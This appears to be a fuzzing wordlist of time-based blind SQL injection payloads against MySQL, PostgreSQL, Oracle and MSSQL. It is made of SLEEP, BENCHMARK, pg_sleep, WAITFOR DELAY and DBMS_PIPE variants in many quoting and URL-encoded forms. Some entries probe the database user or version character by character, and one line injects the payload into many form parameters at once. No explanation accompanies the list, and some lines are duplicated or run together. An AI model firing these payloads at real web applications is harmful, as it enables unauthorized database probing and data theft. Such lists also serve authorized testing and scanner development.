0'XOR(if(now()=sysdate(),sleep(10),0))XOR'X
0"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
‘ AND (SELECT 8839 FROM (SELECT(SLEEP(10)))uzIY) AND ‘mSUA’=’mSUA
'XOR(if((select now()=sysdate()),sleep(10),0))XOR'Z
X'XOR(if(now()=sysdate(),/**/sleep(10)/**/,0))XOR'X
X'XOR(if(now()=sysdate(),(sleep((((10))))),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(1000000,md5('xyz')),0))XOR'X
'XOR(SELECT(0)FROM(SELECT(SLEEP(10)))a)XOR'Z
(SELECT(0)FROM(SELECT(SLEEP(6)))a)
'XOR(if(now()=sysdate(),sleep(10*10),0))OR'
'XOR(if(now()=sysdate(),sleep(10*10*0),0))OR'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
(SELECT * FROM (SELECT(SLEEP(10)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
(select*from(select(sleep(20)))a)
'%2b(select*from(select(sleep(0)))a)%2b'
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))>13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(20),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(32)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10*1),0))XOR'Z
if(now()=sysdate(),sleep(10),0)
"XOR(if((select/**/666/**/where/**/1=1),444,0))XOR" // This would result in a TRUE condition returning a response of ~21,000 bytes
"XOR(if((select/**/666/**/where/**/1=2),444,0))XOR" // This would result in a FALSE condition returning ~27,000 bytes
'XOR(if(now()=sysdate(),sleep(10),0))XOR'
'XOR(if(now()=sysdate(),sleep(10*1),0))OR'
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 5=5)"/if(1=1,sleep(10),0)/*'XOR(if(1=1,sleep(10),0))OR'"XOR(if(1=1,sleep(10),0))OR"*/if(1337=1337,exp(~(1)),0)/*'XOR(if(1337=1337,exp(~(1)),0))OR'"XOR(if(1337=1337,sleep(10),0))OR"*/SLEEP(10)/*' or SLEEP(10) or '" or SLEEP(10) or "*/%2c(select%5*%5from%5(select(sleep(10)))a)
(SELECT(0)FROM(SELECT(SLEEP(8)))a)
'%2b(select*from(select(sleep(10)))a)%2b'
(select*from(select(sleep(10)))a)
'XOR(SELECT CASE WHEN(1234=1234) THEN SLEEP(10) ELSE 0 END)XOR'Z
1'%2b(select*from(select(sleep(10)))a)%2b'
,(select * from (select(sleep(10)))a)
desc%2c(select*from(select(sleep(10)))a)
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(10))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(10))A))(SELECT * FROM (SELECT(SLEEP(10)))YYYY)(SELECT * FROM (SELECT(SLEEP(10)))YYYY)#(SELECT * FROM (SELECT(SLEEP(10)))YYYY)--'+(select*from(select(sleep(10)))a)+'(select(0)from(select(sleep(10)))v)%2f'+(select(0)from(select(sleep(10)))v)+'"(select(0)from(select(sleep(10)))v)%2f*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*%2f(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'\"+(select(0)from(select(sleep(10)))v)+\"*/',''),/*test*/%26%26%09sLeEp(10)%09--+
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(0),0)/'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&category=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&city=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&country=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&email=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&id=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&language=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&page=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&password=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&product_id=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&search=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&state=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&user=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&username=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z&zip=0%27XOR(if(now()=sysdate(),sleep(10),0))XOR%27Z
'%20and%20(select%20%20from%20(select(if(substring(user(),1,1)='p',sleep(10),1)))a)--%20 - true
if(now()=sysdate(),sleep(10),0)/"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XO
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"/
if(now()=sysdate(),sleep(10),0)/'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0) and 1=1)"/
%22)%20AND%201337%3dBENCHMARK(5000000,MD5(0x774c5341))%20AND%20(%221337%22%20LIKE%20%221337
'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
"XOR(if(now()=sysdate(),sleep(10),0))XOR"Z
X'XOR(if(now()=sysdate(),(sleep(10)),0))XOR'X
X'XOR(if((select now()=sysdate()),BENCHMARK(10000000,md5('xyz')),0))XOR'X
'XOR(if(now()=sysdate(),sleep(10),0))OR'
CASE//WHEN(LENGTH(version())=5)THEN(SLEEP(10*1))END
');(SELECT 4564 FROM PG_SLEEP(10))--
["')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5//%23"]
DBMS_PIPE.RECEIVE_MESSAGE(%5BINT%5D,5)%20AND%20%27bar%27=%27bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],5) AND 'bar'='bar
1' AND (SELECT 6268 FROM (SELECT(SLEEP(10)))ghXo) AND 'IKlK'='IKlK
*'XOR(if(2=2,sleep(10),0))OR'
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))&gt;5, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'"
2021 AND (SELECT 6868 FROM (SELECT(SLEEP(10)))IiOE)
BENCHMARK(10000000,MD5(CHAR(116)))
'%2bbenchmark(10000000%2csha1(1))%2b'
1 AND (SELECT(0)FROM(SELECT(SLEEP(10)))a)-- wXyW
CASE//WHEN(LENGTH(version())=10)THEN(SLEEP(10))END
DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
AND 5851=DBMS_PIPE.RECEIVE_MESSAGE([INT],10) AND 'bar'='bar
-1' or 1=IF(LENGTH(ASCII((SELECT USER())))&gt;13, 1, 0)--//
'+(select*from(select(if(1=1,sleep(10),false)))a)+'
'%2bbenchmark(10000000,sha1(1))%2b'
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
";SELECT pg_sleep(20);
;SELECT pg_sleep(20);
and SELECT pg_sleep(20);
1 SELECT pg_sleep(20);
or SELECT pg_sleep(20);
(SELECT pg_sleep(20))
pg_sleep(20)--
1 or pg_sleep(20)--
" or pg_sleep(20)--
' or pg_sleep(20)--
1) or pg_sleep(20)--
") or pg_sleep(20)--
') or pg_sleep(20)--
1)) or pg_sleep(20)--
")) or pg_sleep(20)--
')) or pg_sleep(20)--
' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337
') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337
) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
') WAITFOR DELAY '0:0:20'--
" WAITFOR DELAY '0:0:20'--
')) WAITFOR DELAY '0:0:20'--
'))) WAITFOR DELAY '0:0:20'--
%' WAITFOR DELAY '0:0:20'--
") WAITFOR DELAY '0:0:20'--
")) WAITFOR DELAY '0:0:20'--
"))) WAITFOR DELAY '0:0:20'--
1 waitfor delay '0:0:20'--
1' waitfor delay '0:0:20'--
benchmark(10000000,MD20(1))#
1 or benchmark(10000000,MD20(1))#
" or benchmark(10000000,MD20(1))#
' or benchmark(10000000,MD20(1))#
') or benchmark(10000000,MD20(1))#
1)) or benchmark(10000000,MD20(1))#
")) or benchmark(10000000,MD20(1))#
')) or benchmark(10000000,MD20(1))#
pg_sleep(20)--
" or pg_sleep(20)--
' or pg_sleep(20)--
') or pg_sleep(20)--
1)) or pg_sleep(20)--
")) or pg_sleep(20)--
')) or pg_sleep(20)--
AND (SELECT * FROM (SELECT(SLEEP(20)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(20)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)#
or SLEEP(20)
or SLEEP(20)#
or SLEEP(20)--
or SLEEP(20)="
or SLEEP(20)='
waitfor delay '00:00:020'
waitfor delay '00:00:020'--
waitfor delay '00:00:020'#
benchmark(200000000,MD20(1))
benchmark(200000000,MD20(1))--
benchmark(200000000,MD20(1))#
or benchmark(200000000,MD20(1))
or benchmark(200000000,MD20(1))--
or benchmark(200000000,MD20(1))#
pg_SLEEP(20)
pg_SLEEP(20)--
pg_SLEEP(20)#
or pg_SLEEP(20)
or pg_SLEEP(20)--
or pg_SLEEP(20)#
RLIKE SLEEP(20)--
' RLIKE SLEEP(20)--
' RLIKE SLEEP(20)-- 1337
" RLIKE SLEEP(20)-- 1337
") RLIKE SLEEP(20) AND ("1337" LIKE "1337
")) RLIKE SLEEP(20) AND (("1337" LIKE "1337
"))) RLIKE SLEEP(20) AND ((("1337" LIKE "1337
" RLIKE SLEEP(20) AND "1337" LIKE "1337
' RLIKE SLEEP(20) OR '1337'='1337
') WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
") WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
" WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' AND ELT(1337=1337,SLEEP(20))--
' AND ELT(1337=1337,SLEEP(20))-- 1337
" AND ELT(1337=1337,SLEEP(20))-- 1337
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1`=`1` AND ELT(1337=1337,SLEEP(20)) AND `1`=`1